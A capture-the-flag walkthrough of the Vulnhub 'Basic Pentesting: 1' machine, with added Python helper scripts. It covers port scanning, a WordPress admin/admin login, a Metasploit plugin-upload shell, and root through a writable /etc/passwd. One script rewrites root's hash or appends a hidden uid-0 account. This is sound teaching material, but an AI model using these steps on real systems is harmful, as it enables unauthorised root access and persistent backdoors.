Basic Pentesting: 1 Walkthrough — Vulnhub

Syscall59
Mar 23, 2018 · 4 min read

This time I’m focusing on another little-widdle challenge aimed at 3̶1̶3̶3̶7̶ ̶H̶4̶x̶0̶r̶z̶ beginners:

So, let’s hit the gas with an nmap scan. We are using the following command:

nmap -p- -sS -Pn -n -vvv -oA nmap-host-ports 192.168.1.5

Now, what do all those options mean?

-p-    Scan all ports (actually 1 to 65535; port 0 is not scanned)
-sS    TCP SYN ("half-open") scan, a sort-of stealth scan; it needs raw sockets, so run nmap as root
-Pn    Skip host discovery and scan the target even if it does not answer our probes
-n     Skip reverse DNS resolution
-vvv   Be super verbose and print open ports as they are found
-oA    Save the output in all three formats (normal, XML and grepable) under the given basename, just in case

And here is what we got:

So we have 3 services running on this machine. Now let’s gather more in-depth info about the OS and the services:

This time the command includes just the ports we know are running services and the following options:

-O     OS detection (fingerprints the TCP/IP stack; like -sS it needs root)
-sV    Service version detection (probes each open port to identify the software and version behind it)
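The second scan should be fed the open ports from the first one rather than typed by hand. The script below is an added example, not from the original post: it pulls the open TCP ports out of the grepable file that -oA writes (nmap-host-ports.gnmap) and builds the targeted -sV/-O command. The gnmap text in it is constructed to show the format and is not the box's real output.

```python
"""Extract open TCP ports from nmap's .gnmap output and build the follow-up
-sV/-O scan.  Added example; SAMPLE_GNMAP is constructed, not real output."""
import re

# Constructed sample of a .gnmap file.  Fields are tab-separated and the
# "Ports:" entry lists port/state/proto//service/// for every reported port.
SAMPLE_GNMAP = (
    "# Nmap 7.70 scan initiated as: nmap -p- -sS -Pn -n -vvv -oA nmap-host-ports 192.168.1.5\n"
    "Host: 192.168.1.5 ()\tStatus: Up\n"
    "Host: 192.168.1.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/open/tcp//https///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65531)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds\n"
)

OPEN_TCP = re.compile(r"(\d+)/open/tcp")


def open_tcp_ports(gnmap_text):
    """Sorted list of open TCP ports across all Host: lines.
    Filtered and closed ports are skipped: probing them with -sV wastes time."""
    ports = set()
    for line in gnmap_text.splitlines():
        if line.startswith("Host:") and "Ports:" in line:
            ports.update(int(p) for p in OPEN_TCP.findall(line))
    return sorted(ports)


def service_scan_command(target, ports, outbase="nmap-host-services"):
    """argv for the second scan: version detection and OS fingerprinting on
    just the open ports.  -O (like -sS) needs raw sockets, so run as root."""
    if not ports:
        raise ValueError("no open ports to scan")
    return ["nmap", "-sV", "-O", "-Pn", "-n",
            "-p", ",".join(map(str, ports)), "-oA", outbase, target]


if __name__ == "__main__":
    ports = open_tcp_ports(SAMPLE_GNMAP)
    print(" ".join(service_scan_command("192.168.1.5", ports)))
```

Point it at the real file with `open_tcp_ports(open("nmap-host-ports.gnmap").read())`; the printed command is what the second scan in this walkthrough runs.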

After having read the results from the scan I go for the http service first. On the browser I see this:

That’s the default page for the server. This site is not being maintained for sure!

As I don’t see anything interesting on that page, I use ZAP’s forced browsing (a wordlist-based brute force of paths) to look for valid URLs under http://192.168.1.5/. After a couple of minutes it finds http://192.168.1.5/secret :

This “secret” page looks pretty messy: no styling, no images!!

I start looking for clues here and eventually find the reason it looks like that: all the links of the blog (stylesheets, scripts, navigation) are absolute URLs pointing at a host called “vtcsec”, which my machine cannot resolve, so the browser never loads them. This machine was probably meant to be reached as “vtcsec”. So, in order to see the blog with all its content loaded properly, I add an entry mapping vtcsec to 192.168.1.5 in my hosts file (/etc/hosts on Linux) and try again:
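Spotting the missing virtual host by eye works on a small page; on a bigger one it is quicker to collect every hostname the links point at and diff that against the target IP. The script below is an added example, not from the original post: it parses the HTML of the broken page, lists the hosts referenced in href/src attributes, and prints the hosts-file line that maps the unresolved ones to the target. The HTML in it is constructed to resemble the situation described above, not the real page source.

```python
"""Find hostnames a page's links point at so a missing vhost can be mapped
in /etc/hosts.  Added example; SAMPLE_HTML is constructed, not the real page."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a WordPress page whose assets and links use an
# absolute hostname that does not resolve on the attacker's machine.
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css">
<script src="http://vtcsec/secret/wp-includes/js/jquery/jquery.js"></script>
<link rel="icon" href="/favicon.ico">
</head><body>
<a href="http://vtcsec/secret/">Home</a>
<a href="http://192.168.1.5/secret/wp-login.php">Log in</a>
<a href="https://wordpress.org/">Powered by WordPress</a>
</body></html>
"""


class LinkHostCollector(HTMLParser):
    """Collects the host part of every absolute URL found in href/src attributes."""

    def __init__(self):
        super().__init__()
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                host = urlsplit(value).hostname  # None for relative URLs
                if host:
                    self.hosts.add(host)


def referenced_hosts(html):
    """All hostnames the page links to, relative links excluded."""
    parser = LinkHostCollector()
    parser.feed(html)
    return parser.hosts


def candidate_vhosts(html, target_ip, known_external=("wordpress.org",)):
    """Hosts that are neither the target's IP nor a site we know is external.
    These are the names that need a hosts-file entry pointing at target_ip."""
    return {h for h in referenced_hosts(html)
            if h != target_ip and h not in known_external}


def hosts_line(target_ip, names):
    """One /etc/hosts line mapping every candidate name to the target."""
    return f"{target_ip} {' '.join(sorted(names))}"


if __name__ == "__main__":
    names = candidate_vhosts(SAMPLE_HTML, "192.168.1.5")
    print(hosts_line("192.168.1.5", names))
```

Before editing the hosts file you can confirm the guess without DNS at all: `curl -s -H 'Host: vtcsec' http://192.168.1.5/secret/` should return the same page the browser is struggling with, which tells you the web server answers for that name.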

Now, let’s give it a shot!

This looks much better now!

By now I’m running ZAP’s spider and guessing some valid URLs. Luckily for me this is a WordPress blog (as you can clearly read in the last image), so the default login page (wp-login.php under the blog’s path) is available. And… you know what the credentials for the admin account are? admin/admin.

Now that we have admin access to the WordPress site we can use Metasploit to upload a plugin that spawns a shell when invoked. The module is exploit/unix/webapp/wp_admin_shell_upload (pretty self-explanatory): it logs in with the admin credentials, uploads a plugin carrying the payload and then requests it to trigger the shell. Here’s a screenshot of the exact options I used:

Once inside the box I check which user I am running as, what privileges I have, and look for interesting files:

Using the unix-privesc-check script we can auto-magically look for privilege-escalation misconfigurations (world-writable system files, setuid binaries and the like):

Sadly for this machine, /etc/passwd is writable by our user (ls -l /etc/passwd confirms it). The second field of a passwd entry is normally “x”, meaning “look the hash up in /etc/shadow”; if a hash is placed there instead, login and su use it directly and never consult shadow. So we can download the passwd file to our machine, put a password hash of our own (generated with openssl passwd, for instance) into root’s entry, upload the modified file over the original and su to root with the password we chose:
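The edit itself is easy to botch (one stray colon and nobody can log in any more), so here it is done by a script. This is an added example, not from the original post: it rewrites a constructed copy of the passwd file, never the live one, and the hash in it is a labelled placeholder. Besides the method described above (replacing root’s “x”), it also shows the quieter variant of appending a new uid-0 account and leaving root’s line untouched.

```python
"""Turn a writable /etc/passwd into root: put a password hash in field 2 of
root's entry, or append a new uid-0 user.  Added example; SAMPLE_PASSWD is
a constructed file and PLACEHOLDER_HASH is not a real hash."""
import re

# Constructed sample of a downloaded /etc/passwd.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "user:x:1000:1000:user,,,:/home/user:/bin/bash\n"
)

# Placeholder standing in for a real crypt(3) hash.  Generate one on your own
# box, e.g. `openssl passwd -6 <password>` (SHA-512 crypt), and paste it here.
PLACEHOLDER_HASH = "$6$EXAMPLESALT$EXAMPLEHASHEXAMPLEHASHEXAMPLEHASHEXAMPLEHASH"

# Common glibc crypt formats: $1$ MD5, $5$/$6$ SHA-crypt, $2a/b/y$ bcrypt, $y$ yescrypt.
CRYPT_HASH = re.compile(r"^\$(1|5|6|2[aby]?|y)\$[^:\s]+$")


def _parse(passwd_text):
    """Split passwd text into 7-field records, refusing anything malformed."""
    entries = []
    for line in passwd_text.splitlines():
        if not line:
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        entries.append(fields)
    return entries


def _render(entries):
    return "".join(":".join(fields) + "\n" for fields in entries)


def _check_hash(new_hash):
    # A ':' or whitespace in this field would shift every later field and
    # break logins for that account, so reject anything that is not a hash.
    if not CRYPT_HASH.match(new_hash):
        raise ValueError("not a crypt(3) hash string")


def set_password_hash(passwd_text, user, new_hash):
    """Replace field 2 of `user` with new_hash.  With a hash here, pam_unix
    authenticates against it directly and never consults /etc/shadow."""
    _check_hash(new_hash)
    entries = _parse(passwd_text)
    for fields in entries:
        if fields[0] == user:
            fields[1] = new_hash
            return _render(entries)
    raise KeyError(user)


def add_root_equivalent(passwd_text, name, new_hash):
    """Append a new account with uid/gid 0 and leave root's own line alone;
    `su name` then gives a root shell and root's real password still works."""
    _check_hash(new_hash)
    entries = _parse(passwd_text)
    if any(fields[0] == name for fields in entries):
        raise ValueError(f"{name} already exists")
    entries.append([name, new_hash, "0", "0", "", "/root", "/bin/bash"])
    return _render(entries)


def password_field(passwd_text, user):
    """Field 2 of `user`'s entry, for checking the edit before uploading."""
    for fields in _parse(passwd_text):
        if fields[0] == user:
            return fields[1]
    raise KeyError(user)


if __name__ == "__main__":
    print(set_password_hash(SAMPLE_PASSWD, "root", PLACEHOLDER_HASH), end="")
```

Run it against the downloaded copy, check the output with `password_field`, upload it over /etc/passwd and `su root` (or `su <name>` for the appended account) with the password you hashed. Keep the original copy around: if the upload is truncated or a field is off, restoring it is the only way to get logins working again.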

Hope you enjoyed this one! Until next time


Written by Syscall59 (Shellcode for the masses)
Twitter: @syscall59 | medium.syscall59.com | syscall59@protonmail.com